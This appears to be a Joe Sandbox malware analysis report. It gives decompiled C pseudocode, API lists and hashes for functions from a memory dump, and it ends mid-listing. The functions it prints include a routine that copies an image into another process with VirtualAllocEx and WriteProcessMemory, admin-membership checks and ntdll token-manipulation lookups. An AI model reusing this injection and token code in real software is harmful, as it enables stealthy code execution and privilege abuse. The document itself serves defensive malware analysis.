0x0040412a
0x00000000
0x00404101
0x0040410b
0x00404117
0x0040411c
0x00000000
0x0040411c
0x004040f1
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
ExitProcess.KERNEL32 ref: 00404121

Strings

PromptOnSecureDesktop, xrefs: 004040A1, 004040B1, 00404133

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CreateEventExitProcess
String ID: PromptOnSecureDesktop
API String ID: 2404124870-2980165447
Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406EDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0x0
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0x0
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}

0x00406ee0
0x00406eed
0x00406f06
0x00406f09
0x00406f0f
0x00406f15
0x00406f1a
0x00406f1c
0x00406f1c
0x00406f24
0x00406f2c
0x00406f36
0x00406f36
0x00406f3e
0x00406f3e
0x00406f44
0x00406f4b
0x00406f50
0x00406f57
0x00406f57
0x00406f4b
0x00406f5e

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
FreeSid.ADVAPI32(?), ref: 00406F3E

Strings

*p@, xrefs: 00406F1C, 00406F1F

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID: *p@
API String ID: 3429775523-2474123842
Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040637C, Relevance: 6.1, APIs: 4, Instructions: 67
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}

0x00406384
0x00406395
0x0040639a
0x004063a9
0x004063af
0x004063b4
0x004063f5
0x004063f5
0x004063b6
0x004063b9
0x004063d0
0x004063d4
0x00000000
0x004063d6
0x004063da
0x004063f3
0x004063fc
0x00406406
0x0040640a
0x00000000
0x00000000
0x00000000
0x004063f3
0x004063d4
0x0040640f
0x00406386
0x00406389
0x00406389

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408E26, Relevance: 4.6, APIs: 3, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
				char _v12;
				int _t13;
				DWORD* _t14;
				int _t15;
				void* _t20;
				void* _t23;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
				if(_t20 == 0xffffffff) {
					_t13 = 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						E00408DF1( &_v12);
						_t23 =  &_v12;
						_a12 = 8;
					}
					_t14 = _a24;
					 *_t14 = 0;
					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
					CloseHandle(_t20);
					_t13 = _t15;
				}
				return _t13;
			}

0x00408e26
0x00408e29
0x00408e2a
0x00408e6c
0x00408e6e
0x00408e79
0x00408ebe
0x00408e7b
0x00408e7b
0x00408e80
0x00408e86
0x00408e8c
0x00408e8f
0x00408e8f
0x00408e96
0x00408e9e
0x00408eab
0x00408eb4
0x00408eba
0x00408eba
0x00408ec4

APIs

CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00408EAB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4

Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$CloseControlCreateDeviceHandle
String ID:
API String ID: 3754425949-0
Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004088B0(intOrPtr _a4) {
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t101 = _a4;
				E0040EE2A(_t99, _t101, 0, 0x3e0);
				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
				_t98 = __imp__#6;
				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
				 *((intOrPtr*)(_t101 + 8)) = 0;
				 *((intOrPtr*)(_t101 + 0xc)) = 0;
				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
				 *((intOrPtr*)(_t101 + 0x100)) = 0;
				 *((intOrPtr*)(_t101 + 0x104)) = 0;
				 *((intOrPtr*)(_t101 + 0x108)) = 0;
				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
				 *((intOrPtr*)(_t101 + 0x110)) = 0;
				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
				return _t98;
			}

0x004088b1
0x004088bf
0x004088c9
0x004088d4
0x004088df
0x004088ea
0x004088f5
0x00408900
0x0040890b
0x00408916
0x00408921
0x0040892c
0x00408937
0x0040893d
0x00408945
0x0040894c
0x00408953
0x0040895a
0x0040895d
0x00408960
0x00408967
0x0040896e
0x00408978
0x0040897f
0x00408986
0x0040898d
0x00408994
0x0040899b
0x004089a2
0x004089a9
0x004089b0
0x004089b7
0x004089be
0x004089c5
0x004089cc
0x004089d3
0x004089da
0x004089e1
0x004089e8
0x004089ef
0x004089f6
0x00408a00
0x00408a0a
0x00408a14
0x00408a1e
0x00408a28
0x00408a32
0x00408a3c
0x00408a46
0x00408a50
0x00408a5a
0x00408a64
0x00408a6e
0x00408a78
0x00408a82
0x00408a8c
0x00408a92
0x00408a98
0x00408aa2
0x00408aac
0x00408ab6
0x00408ac0
0x00408ac6
0x00408acc
0x00408ad2
0x00408ad8
0x00408adf
0x00408ae9
0x00408af3
0x00408afd
0x00408b07
0x00408b11
0x00408b1b
0x00408b25
0x00408b2f
0x00408b39
0x00408b43
0x00408b4d
0x00408b57
0x00408b61
0x00408b6b
0x00408b75
0x00408b7f
0x00408b89
0x00408b93
0x00408b9d
0x00408ba7
0x00408bb2

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918;
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress( *0x413918, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress( *0x413918, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x00401000
0x00401006
0x0040100b
0x00401023
0x0040102a
0x004010c2
0x004010c4
0x004010cb
0x0040127b
0x0040127b
0x004010d1
0x004010dc
0x004010e1
0x004010e3
0x004010ea
0x00000000
0x004010f0
0x004010fc
0x00401101
0x00401103
0x0040110a
0x00000000
0x00401110
0x0040111c
0x00401121
0x00401123
0x0040112a
0x00000000
0x00401130
0x0040113b
0x00401140
0x00401142
0x00401149
0x00000000
0x0040114f
0x0040115b
0x00401160
0x00401162
0x00401169
0x00000000
0x0040116f
0x0040117b
0x00401180
0x00401182
0x00401189
0x00000000
0x0040118f
0x0040119a
0x0040119f
0x004011a1
0x004011a8
0x00000000
0x004011ae
0x004011ba
0x004011bf
0x004011c1
0x004011c8
0x00000000
0x004011ce
0x004011da
0x004011df
0x004011e1
0x004011e8
0x00000000
0x004011ee
0x004011f9
0x004011fe
0x00401200
0x00401207
0x00000000
0x00401209
0x00401215
0x0040121a
0x0040121c
0x00401223
0x00000000
0x00401225
0x00401231
0x00401236
0x00401238
0x0040123f
0x00000000
0x00401241
0x0040124c
0x00401251
0x00401253
0x0040125a
0x00000000
0x0040125c
0x00401268
0x0040126d
0x0040126f
0x00401276
0x00401276
0x00401279
0x00000000
0x00000000
0x00401279
0x0040125a
0x0040123f
0x00401223
0x00401207
0x004011e8
0x004011c8
0x004011a8
0x00401189
0x00401169
0x00401149
0x0040112a
0x0040110a
0x004010ea
0x0040127f
0x004010ae
0x004010b4
0x004010b4
0x0040100d
0x00401012
0x00401018
0x0040101f
0x00000000
0x00401022
0x00401022
0x00401022
0x0040101f

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A

Strings

RtlLengthSid, xrefs: 00401246
NtQueryInformationToken, xrefs: 00401262
RtlInitUnicodeString, xrefs: 00401135
RtlSetLastWin32Error, xrefs: 004010D6
RtlNtStatusToDosError, xrefs: 00401194
RtlAllocateAndInitializeSid, xrefs: 0040120F
NtDuplicateToken, xrefs: 004011F3
NtSetInformationToken, xrefs: 00401175
NtClose, xrefs: 004011B4
NtSetInformationThread, xrefs: 00401155
RtlExpandEnvironmentStrings_U, xrefs: 004010BC
NtFilterToken, xrefs: 0040122B
NtTerminateProcess, xrefs: 004010F6
NtOpenProcessToken, xrefs: 004011D4
ntdll.dll, xrefs: 0040100D
RtlFreeSid, xrefs: 00401116

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 2238633743-3228201535
Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B211, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}

0x0040b225
0x0040b22c
0x0040b233
0x0040b23a
0x0040b241
0x0040b248
0x0040b24f
0x0040b256
0x0040b25d
0x0040b264
0x0040b26b
0x0040b272
0x0040b279
0x0040b280
0x0040b287
0x0040b28e
0x0040b295
0x0040b29c
0x0040b2a3
0x0040b2ad
0x0040b2c2
0x0040b2d0
0x0040b2af
0x0040b2b3
0x0040b2b3
0x0040b2d2
0x0040b2d7
0x0040b2e1
0x0040b2e7
0x0040b2f0
0x0040b306
0x0040b30c
0x0040b30f
0x0040b2f2
0x0040b2f4
